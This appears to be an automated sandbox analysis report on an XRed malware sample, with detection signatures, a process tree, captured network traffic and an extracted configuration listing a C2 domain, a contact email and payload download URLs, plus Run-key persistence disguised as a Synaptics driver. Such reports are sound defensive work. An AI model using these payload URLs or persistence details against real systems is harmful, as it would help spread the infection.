Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1583479
MD5:	7e33585d157419e39fb4d232c9f0c5dc
SHA1:	1cf4864a9b009e12534cc299c14466f2b2c9cea3
SHA256:	027a4baf9864a23fe09d99be3a6f83d1841e47aac2f94d313d2580e84d1b1b39
Tags:	exeuser-jstrosch
Infos:

Detection

XRed

Score:	70
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected XRed

C2 URLs / IPs found in malware configuration

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Document contains an embedded VBA with functions possibly related to HTTP operations

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Drops PE files to the document folder of the user

Machine Learning detection for dropped file

Machine Learning detection for sample

Uses dynamic DNS services

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May infect USB drives

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

file.exe (PID: 6800 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7E33585D157419E39FB4D232C9F0C5DC)

._cache_file.exe (PID: 2896 cmdline: "C:\Users\user\Desktop\._cache_file.exe" MD5: F0248D477E74687C5619AE16498B13D4)

._cache_file.exe (PID: 5544 cmdline: "C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe" -burn.clean.room="C:\Users\user\Desktop\._cache_file.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572 MD5: 843288FD72A1152B50B4E4B7344BB592)

Synaptics.exe (PID: 648 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: B753207B14C635F29B2ABF64F603570A)

EXCEL.EXE (PID: 5596 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)

splwow64.exe (PID: 8000 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)

Synaptics.exe (PID: 6748 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: B753207B14C635F29B2ABF64F603570A)

cleanup

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
file.exe	JoeSecurity_XRed	Yara detected XRed	Joe Security
file.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\ProgramData\Synaptics\RCX1D61.tmp	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\ProgramData\Synaptics\RCX1D61.tmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\Users\user\Documents\DVWHKMNFNN\~$cache1	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\Users\user\Documents\DVWHKMNFNN\~$cache1	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\ProgramData\Synaptics\Synaptics.exe	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\ProgramData\Synaptics\Synaptics.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1707797883.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_XRed	Yara detected XRed	Joe Security
00000000.00000000.1707797883.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Process Memory Space: file.exe PID: 6800	JoeSecurity_XRed	Yara detected XRed	Joe Security

Sigma Signatures

System Summary

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 6800, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 648, TargetFilename: C:\Users\user\AppData\Local\Temp\mAsbqr4h.xlsm

Suricata Signatures

ET MALWARE Snake Keylogger Payload Request (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:41:42.133241+0100	2044887	1	A Network Trojan was detected	192.168.2.4	49853	216.58.212.174	443	TCP

ETPRO MALWARE W32.Bloat-A Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:40:42.853634+0100	2832617	1	Malware Command and Control Activity Detected	192.168.2.4	49736	69.42.215.252	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe	Avira: detected
Source: file.exe	Avira: detected

Antivirus detection for URL or domain

Source: http://xred.site50.net/syn/SUpdate.iniZ	Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SSLLibrary.dlp	Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SSLLibrary.dll6	Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/Synaptics.rarZ	Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SUpdate.iniH)	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\ProgramData\Synaptics\RCX1D61.tmp	Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCX1D61.tmp	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\Synaptics.exe	Avira: detection malicious, Label: WORM/Delphi.Gen
Source: C:\ProgramData\Synaptics\Synaptics.exe	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1	Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006

Found malware configuration

Source: file.exe

Malware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Synaptics\RCX1D61.tmp	ReversingLabs: Detection: 91%
Source: C:\ProgramData\Synaptics\Synaptics.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1	ReversingLabs: Detection: 91%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 86%

Machine Learning detection for dropped file

Source: C:\ProgramData\Synaptics\RCX1D61.tmp	Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000A9EB7 DecryptFileW,	1_2_000A9EB7
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000CF961 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,	1_2_000CF961
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000A9C99 DecryptFileW,DecryptFileW,	1_2_000A9C99
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006A9EB7 DecryptFileW,	2_2_006A9EB7
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006CF961 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,	2_2_006CF961
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006A9C99 DecryptFileW,DecryptFileW,	2_2_006A9C99

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe

Window detected: MICROSOFT SOFTWARE LICENSE TERMSMICROSOFT VISUAL C++ 2019 RUNTIME These license terms are an agreement between Microsoft Corporation (or based on where you live one of its affiliates) and you. They apply to the software named above. The terms also apply to any Microsoft services or updates for the software except to the extent those have different terms.IF YOU COMPLY WITH THESE LICENSE TERMS YOU HAVE THE RIGHTS BELOW.INSTALLATION AND USE RIGHTS. You may install and use any number of copies of the software.TERMS FOR SPECIFIC COMPONENTS.Microsoft Platforms. The software may include components from Microsoft Windows; Microsoft Windows Server; Microsoft SQL Server; Microsoft Exchange; Microsoft Office; and Microsoft SharePoint. These components are governed by separate agreements and their own product support policies as described in the Microsoft Licenses folder accompanying the software except that if license terms for those components are also included in the associated installation directory those license terms control.Third Party Components. The software may include third party components with separate legal notices or governed by other agreements as may be described in the ThirdPartyNotices file(s) accompanying the software. SCOPE OF LICENSE. The software is licensed not sold. This agreement only gives you some rights to use the software. Microsoft reserves all other rights. Unless applicable law gives you more rights despite this limitation you may use the software only as expressly permitted in this agreement. In doing so you must comply with any technical limitations in the software that only allow you to use it in certain ways. You may notwork around any technical limitations in the software;reverse engineer decompile or disassemble the software or otherwise attempt to derive the source code for the software except and only to the extent required by third party licensing terms governing the use of certain open source components that may be included in the software;remove minimize block or modify any notices of Microsoft or its suppliers in the software; use the software in any way that is against the law; orshare publish rent or lease the software or provide the software as a stand-alone offering for others to use or transfer the software or this agreement to any third party.EXPORT RESTRICTIONS. You must comply with all domestic and international export laws and regulations that apply to the software which include restrictions on destinations end users and end use. For further information on export restrictions visit www.microsoft.com/exporting <http://www.microsoft.com/exporting>. SUPPORT SERVICES. Because this software is as is we may not provide support services for it.ENTIRE AGREEMENT. This agreement and the terms for supplements updates Internet-based services and support services that you use are the entire agreement for the software and support services.APPLICABLE LAW. If you acquired the software in the United States Washing

Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1028\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1029\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1031\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1036\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1040\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1041\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1042\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1045\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1046\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1049\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1055\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\2052\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\3082\license.rtf	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.4:49853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.4:49887 version: TLS 1.2

Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: file.exe, ._cache_file.exe.0.dr, ._cache_file.exe.1.dr, Synaptics.exe.0.dr
Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\WixStdBA.pdb source: ._cache_file.exe, 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmp, wixstdba.dll.2.dr

Source: file.exe, 00000000.00000000.1707797883.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: [autorun]
Source: file.exe, 00000000.00000000.1707797883.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: [autorun]
Source: file.exe, 00000000.00000000.1707797883.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: autorun.inf
Source: file.exe	Binary or memory string: [autorun]
Source: file.exe	Binary or memory string: [autorun]
Source: file.exe	Binary or memory string: autorun.inf
Source: RCX1D61.tmp.0.dr	Binary or memory string: [autorun]
Source: RCX1D61.tmp.0.dr	Binary or memory string: [autorun]
Source: RCX1D61.tmp.0.dr	Binary or memory string: autorun.inf
Source: Synaptics.exe.0.dr	Binary or memory string: [autorun]
Source: Synaptics.exe.0.dr	Binary or memory string: [autorun]
Source: Synaptics.exe.0.dr	Binary or memory string: autorun.inf
Source: ~$cache1.3.dr	Binary or memory string: [autorun]
Source: ~$cache1.3.dr	Binary or memory string: [autorun]
Source: ~$cache1.3.dr	Binary or memory string: autorun.inf

Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000D4315 FindFirstFileW,FindClose,	1_2_000D4315
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000A993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	1_2_000A993E
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_00093BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	1_2_00093BC3
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006D4315 FindFirstFileW,FindClose,	2_2_006D4315
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006A993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	2_2_006A993E
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_00693BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	2_2_00693BC3
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_6C8D65CB FindFirstFileW,FindClose,	2_2_6C8D65CB

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: excel.exe

Memory has grown: Private usage: 2MB later: 72MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.4:49736 -> 69.42.215.252:80
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49853 -> 216.58.212.174:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: xred.mooo.com

Uses dynamic DNS services

Source: unknown

DNS query: name: freedns.afraid.org

Source: Joe Sandbox View

IP Address: 69.42.215.252 69.42.215.252

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=lSm9ELS1mT_NJfPcL6s2k9KF40P-p_PHfsCVyyjYOh5O_FCuZomYPERO12Ni77Jp7w8szZNvUT40gG7k03Vgjfofr2RWsKCMMqzS4A8F8ycWckzt7AMicc8H9ffid0GpKy9MCFWKF0kMsQyHDjZ5qSu9Cqx-RH8SZWoLf6lyj0jhFG_xzvZAWZg
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lSm9ELS1mT_NJfPcL6s2k9KF40P-p_PHfsCVyyjYOh5O_FCuZomYPERO12Ni77Jp7w8szZNvUT40gG7k03Vgjfofr2RWsKCMMqzS4A8F8ycWckzt7AMicc8H9ffid0GpKy9MCFWKF0kMsQyHDjZ5qSu9Cqx-RH8SZWoLf6lyj0jhFG_xzvZAWZg
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=lSm9ELS1mT_NJfPcL6s2k9KF40P-p_PHfsCVyyjYOh5O_FCuZomYPERO12Ni77Jp7w8szZNvUT40gG7k03Vgjfofr2RWsKCMMqzS4A8F8ycWckzt7AMicc8H9ffid0GpKy9MCFWKF0kMsQyHDjZ5qSu9Cqx-RH8SZWoLf6lyj0jhFG_xzvZAWZg
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lSm9ELS1mT_NJfPcL6s2k9KF40P-p_PHfsCVyyjYOh5O_FCuZomYPERO12Ni77Jp7w8szZNvUT40gG7k03Vgjfofr2RWsKCMMqzS4A8F8ycWckzt7AMicc8H9ffid0GpKy9MCFWKF0kMsQyHDjZ5qSu9Cqx-RH8SZWoLf6lyj0jhFG_xzvZAWZg
Source: global traffic	HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: xred.mooo.com
Source: global traffic	DNS traffic detected: DNS query: freedns.afraid.org
Source: global traffic	DNS traffic detected: DNS query: docs.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC60UMv9jdCeYD78Uy2VkeW2wfsUJiUd8x7GmtwoeV2BEt7tW73vB2FhwU0U2GgJsGTJ_2pdTDIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:41:43 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-LmsSgu6SGa5Uu6xBTtNPcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=lSm9ELS1mT_NJfPcL6s2k9KF40P-p_PHfsCVyyjYOh5O_FCuZomYPERO12Ni77Jp7w8szZNvUT40gG7k03Vgjfofr2RWsKCMMqzS4A8F8ycWckzt7AMicc8H9ffid0GpKy9MCFWKF0kMsQyHDjZ5qSu9Cqx-RH8SZWoLf6lyj0jhFG_xzvZAWZg; expires=Fri, 04-Jul-2025 19:41:43 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5vS99YvCHeQo5UKS2s6XVlfJiBtgWVzNTDStlEycnmdPL7thyFvt6noQUTLiWpO6AKqLPrh8sContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:41:45 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-9MB1npEM7b4K-v9-xRPSBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
